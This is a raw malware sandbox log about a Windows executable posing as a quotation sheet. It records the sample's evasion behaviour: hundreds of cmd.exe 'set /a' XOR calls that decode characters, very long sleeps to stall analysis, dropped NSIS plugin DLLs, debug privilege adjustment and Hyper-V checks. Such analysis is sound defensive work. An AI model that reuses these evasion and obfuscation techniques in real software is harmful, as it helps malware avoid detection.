            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Mass process execution to delay analysis
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeAPI/Special instruction interceptor: Address: 26A4F38
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeMemory allocated: 34CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeMemory allocated: 36CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeAPI coverage: 2.5 %
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe TID: 5680Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe TID: 5680Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00406167 FindFirstFileA,FindClose,131_2_00406167
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,131_2_00405705
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00402688 FindFirstFileA,131_2_00402688
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeThread delayed: delay time: 600000Jump to behavior
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeAPI call chain: ExitProcess graph end nodegraph_0-4233
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeAPI call chain: ExitProcess graph end nodegraph_0-4398
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
